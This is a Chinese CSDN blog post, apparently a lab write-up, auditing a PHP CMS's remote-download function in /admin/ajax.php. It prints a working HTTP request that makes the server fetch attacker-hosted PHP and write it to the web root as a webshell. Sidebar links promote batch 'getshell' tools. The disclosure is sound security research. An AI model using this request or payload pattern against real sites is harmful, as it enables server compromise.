记一次文件下载getshell白盒

最新推荐文章于 2023-09-05 15:10:58 发布
最新推荐文章于 2023-09-05 15:10:58 发布
阅读量258 收藏
点赞数
文章标签: php 网络安全 web安全 代码复审 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42508548/article/details/128905652
版权

前言

2023年了,敬业的人还在上班,首先祝大家新年快乐,期待新的一年有新的成长~

闲来无事,逛逛代码仓库,扫一扫,看到某CMS里面有这么一个方法,里面的内容很简单,可以说是目测存在getshell漏洞。但是实际上踩坑无数,弄了很久,因为分析的时候有意思,利用的也有点意思,所以分享出来。

代码分析

  1. 首先查看漏洞点,downpic方法获取了一个参数$url,未进行过滤,获取URL文件内容后进行文件写入。其中写入后的文件后缀即为传入的URL中的文件后缀。

  1. 搜索发现/admin/ajax.php存在4处位置调用了此方法

3、通过几次筛选,最后确定入口点为collection_all

第一个if判断,需要id搜索到有东西,经测试网站默认安装便有一条数据,所以id赋值为1即可

  1. 往下执行,发现这里远程加载的文件内容需要有$C_titlestart和$C_contentstart

构造文件内容第一行

  1. 再往下,进入下一个if判断,条件为sql语句执行结果小于等于0

构造文件内容第二行中的一串随机字符

6、下一个条件分支,需要文件内容中含有src=",直接复制了那行代码到文件中

7、后面循环无影响,到$picx的赋值,因最后拼接的路径为src="后的字符,故将index.php放到文件的最后面,然后调用了downpic方法

8、查看downpic方法。传入URL,生成以时间戳+随机字符的文件名,获取远程文件内容,写入文件。

漏洞利用

1、构造恶意请求,向外请求index.php


GET /admin/ajax.php?type=collection&action=all&id=1&lang=0&pageurl=http://10.211.55.2:21/index.php HTTP/1.1
Host: 10.211.55.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://10.211.55.3
Connection: close
Referer: http://10.211.55.3/admin/
Cookie: count_all=0; authx=; userx=; passx=; add=%E4%B8%AD%E5%9B%BD; user=admin; pass=e317896f881c24dd527ea70a654d0a00; A_type=1; auth=1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1; newsauth=all; productauth=all; textauth=all; formauth=all; bbsauth=all; PHPSESSID=ftd1rm1hffcfvdh2d3l9hkmln1; __vtins__JdquY3gNURaKiAFU=%7B%22sid%22%3A%20%222f9206ee-11da-59be-af05-5ce77d606c29%22%2C%20%22vd%22%3A%201%2C%20%22stt%22%3A%200%2C%20%22dr%22%3A%200%2C%20%22expires%22%3A%201657185361904%2C%20%22ct%22%3A%201657183561904%7D; __51uvsct__JdquY3gNURaKiAFU=2; __51vcke__JdquY3gNURaKiAFU=8c5f5b50-675a-576d-a410-a4ba399a8cde; __51vuft__JdquY3gNURaKiAFU=1657173569846; LOGIN_LANG=cn
Content-Length: 2

2、返回成功即可在media目录下看到文件已经成功上传,内容为index.php文件内容

攻击者则可以通过网站安全-文件管理功能查看具体文件名

3、访问该文件,获取webshell

总结

这个漏洞我好像分析了2个小时吧,主要是构造payload方面花了心思,一开始没想看很多代码,直接利用发现失败了,调试了几次终于可以利用,总的来说,利用条件苛刻,可利用性不高,聊胜于无。

题外话:最近新开了个知识星球,期待大家关注。本来是打算放项目上的干货的,但是最近迷上了反序列化和内存马,所以可能会有一段时间都是这类内容。当然干货也会不定时更新,主要分享实战方面的细节。。。

大夜猫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[清风批量]getshell工具.zip
07-28
getshell超级好用的工具
某集团任意文件下载到虚拟主机getshell
chengman3837的博客
01-03 619
本文原创作者:1975, 本文属i春秋原创奖励计划,未经许可禁止转载! 0x01 前言 从某群的故事改编而来,都是些老套路各位看官看得高兴就好;第一次在i春秋发帖有点紧张,如果有什么不周到的地方请去打死阿甫哥哥。你没听错,阿甫哥哥推荐。 0x02 什么是任意文件下载 说到文件...
一次任意文件下载getshell
渗透测试研究中心
01-19 385
0x01 前言某日闲来无事,上fofa搜了xx系统,想着碰碰运气,类似这样0x02测试过程随便挑了一个站点打开Em…,试试运气,反手admin admin就进去了,是一个管理系统然后根据网站的功能点,随便点击几个,发现除了常规的操作也没啥了,翻了一会,发现有一个文件下载操作好家伙,藏得挺深,抓包看看,请求的地址好像是一个文件fileName改成../etc/passwd看看,好家伙,报错了看来...
【bugku】-getshell-蚁剑插件的下载
weixin_52116519的博客
04-04 4857
大致步骤看这篇文章,操作细节往下看 1 打开代理设置,否则很慢 2 代理设置 3 插件市场 4 下载插件 5 加载插件 6 得刷新 7 蚁剑连接http://114.67.175.224:15197/.antproxy.php 8 找flag
常用getshell工具下载
dcdmer1211的博客
02-21 373
常用getshell工具下载,是一款全自动一键傻瓜式getshell工具,日出上百
录一下:盒测试工具集
01-31
一篇图文带你了解盒测试用例设计方法
01-27
覆盖率:是用来度量测试完整性的一个手段测试设计方法——语句覆盖语句覆盖:设计测试用例,使得程序中每条语句至少被执行一次。 例如:案例代码中共有4条可执行语句设计测试用例执行了3条,语句覆盖率为3/4=75%测试...
盒测试实验报告word文件
06-18
软件质量保证与测试盒测试实验报告,仅个人作业,不保证完全正确。
实验一 盒测试实验一 指导书1
08-04
【实验一 盒测试实验一 指导书1】 实验一的目的是深入理解并实践盒测试,特别是基于控制流的测试方法。在这个实验中,学生将使用Java或C/C++编程环境,比如Java SDK与Eclipse或Visual Studio,来测试一个名为...
天羽全自动getshell工具VIP版.zip
09-25
天羽全自动getshell工具VIP版,批量getshell工具,超级好用!!大家下载试试吧!!效果不错哦!!
HM收割机一建getshell
02-22
懂得人自然懂 不懂得当然不懂 纯自动化 关键词 排名 拿shel l一键getshell
批量getshell工具
09-08
2017最新版的批量getshell工具,最全的cms识别系统,最快的getshell行动,各种cms,各种漏洞,各种getshell,你值得拥有!
houyusen#poc#YzmCMS V5.4 后台getshell(二)1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
Getshell 网站漏洞批量检测工具破解后使用教程
07-26
Getshell网站漏洞批量检测工具破解后使用教程,运行软件,等待大概 3分钟左右软件才会启动。
siteserver远程模板下载Getshell漏洞
Jiajiajiang_的博客
03-28 4254
此处不做分析,只做漏洞的复现。 参考:https://www.freebuf.com/articles/web/195105.html 准备工作: 需要一台公网服务器,一个有漏洞的站点(肯定的对8)。 第一步 先写一个马,此处是aspx站点,自然是aspx的马,但因为会有拦截等,所以构造如下的马。 <%@ Page Language="Jscript" Debug=true%&...
CTF_Web:8位以内可控字符getshell
AFCC_的博客(Web_Dog)
08-04 1504
题目来源 近期在练习CTF中的web题目时遇到一个8位字符以内可以随意执行命令,最终需要getshell 的题目,发现很多前辈都写了这类型的题解,但也需要自己实践一下,题目源码访问后如图: 思路:可以看出当提交的参数1包含的值少于8位时,都会当作命令执行,首先?1=ls发现所有文件名都超过了8位,显然单靠这8位执行命令是不足以cat某个文件,于是需要利用拼接文件名执行代码getshell。 解题利用知识点 >a "在linux中会直接创建这个文件,但没有内容" ls -t "将目录中的文件以时间顺
ShopXO商城系统文件上传0Day代审历程
weixin_43526443的博客
09-05 2090
这两天攻防中,某政局内网横向发现多网段服务器,该服务器搭建了ShopXO商城系统(后来发现是开发临时搭建的,准备做二开用的)。结果花了30来秒审了个垃圾Day拿下该服务器,本文就是给新手提供思路(没交cnvd,懒)
GKCTF2020部分web
0xdawn的博客
05-28 1002
[GKCTF2020]CheckIN <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Ginkgo']; $this-&
关于Tom表哥对卖手机的骗子网站的一不小心的分析
feichang2的博客
02-08 2916
一切的一切都要从一只蝙蝠开始说起…总之最近很闲,于是逛bilibili,发现了大表哥一不小心就进了某个骗子网站的后台,不仅心向往之 但不幸的是据说为了规避风险,表哥删减了很多内容,看的我云里雾里,一不小心就晕了 Tom表哥的视频在这里 为了有朝一日我也能够像表哥一样一不小心,我决定动手复现一波 放一张视频截图 可以看到表哥用的是burpsuite爆破日志,然后知道管理员密码进了后台 网站是由基于...
一元二次方程盒测试
最新发布
01-03
以下是一元二次方程盒测试的代码示例: ```python import math def solve_quadratic_equation(a, b, c): discriminant = b**2 - 4*a*c if discriminant > 0: x1 = (-b + math.sqrt(discriminant)) / (2*a) ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值